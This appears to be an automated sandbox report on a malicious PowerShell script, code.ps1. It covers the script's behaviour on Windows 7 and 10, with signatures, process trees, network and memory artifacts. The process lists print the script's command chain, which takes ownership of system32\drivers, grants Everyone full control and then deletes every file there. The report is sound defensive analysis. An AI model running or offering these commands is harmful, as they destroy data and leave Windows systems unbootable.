Malware Analysis Report

2024-11-16 12:49

Sample ID 240809-zejrysxhnr
Target code.ps1
SHA256 e53f33a359d561fbcaa76220b89e269001758a7be3b77886e9ad9a87f87a4399
Tags
discovery execution exploit
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

e53f33a359d561fbcaa76220b89e269001758a7be3b77886e9ad9a87f87a4399

Threat Level: Likely malicious

The file code.ps1 was found to be: Likely malicious.

Malicious Activity Summary

discovery execution exploit

Possible privilege escalation attempt

Modifies file permissions

Command and Scripting Interpreter: PowerShell

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-09 20:37

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-09 20:37

Reported

2024-08-09 20:40

Platform

win7-20240729-en

Max time kernel

122s

Max time network

127s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\code.ps1

Signatures

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2384 wrote to memory of 2216 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2384 wrote to memory of 2216 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2384 wrote to memory of 2216 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2216 wrote to memory of 568 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2216 wrote to memory of 568 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2216 wrote to memory of 568 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 2384 wrote to memory of 2808 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2384 wrote to memory of 2808 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2384 wrote to memory of 2808 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2808 wrote to memory of 2824 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2808 wrote to memory of 2824 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2808 wrote to memory of 2824 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2384 wrote to memory of 2840 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2384 wrote to memory of 2840 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2384 wrote to memory of 2840 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\code.ps1

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "takeown /f %windir%\system32\drivers\* >nul"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\system32\drivers\*

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "icacls %windir%\system32\drivers\* /grant Everyone:(F) >nul"

C:\Windows\system32\icacls.exe

icacls C:\Windows\system32\drivers\* /grant Everyone:(F)

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "del /s /q %windir%\system32\drivers\* >nul"

C:\Windows\system32\wbem\WMIADAP.EXE

wmiadap.exe /F /T

Network

N/A

Files

memory/2384-4-0x000007FEF6ACE000-0x000007FEF6ACF000-memory.dmp

memory/2384-5-0x000000001B620000-0x000000001B902000-memory.dmp

memory/2384-6-0x0000000002820000-0x0000000002828000-memory.dmp

memory/2384-7-0x000007FEF6810000-0x000007FEF71AD000-memory.dmp

memory/2384-8-0x000007FEF6810000-0x000007FEF71AD000-memory.dmp

memory/2384-9-0x000007FEF6810000-0x000007FEF71AD000-memory.dmp

memory/2384-10-0x000007FEF6810000-0x000007FEF71AD000-memory.dmp

memory/2384-11-0x000007FEF6810000-0x000007FEF71AD000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-09 20:37

Reported

2024-08-09 20:40

Platform

win10v2004-20240802-en

Max time kernel

140s

Max time network

146s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\code.ps1

Signatures

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\code.ps1

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "takeown /f %windir%\system32\drivers\* >nul"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\system32\drivers\*

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "icacls %windir%\system32\drivers\* /grant Everyone:(F) >nul"

C:\Windows\system32\icacls.exe

icacls C:\Windows\system32\drivers\* /grant Everyone:(F)

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "del /s /q %windir%\system32\drivers\* >nul"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 99.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 10.27.171.150.in-addr.arpa udp

Files

memory/3244-0-0x00007FFBE9C63000-0x00007FFBE9C65000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ukayqsyd.wht.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3244-10-0x00000266F5330000-0x00000266F5352000-memory.dmp

memory/3244-11-0x00007FFBE9C60000-0x00007FFBEA721000-memory.dmp

memory/3244-12-0x00007FFBE9C60000-0x00007FFBEA721000-memory.dmp

memory/3244-15-0x00007FFBE9C60000-0x00007FFBEA721000-memory.dmp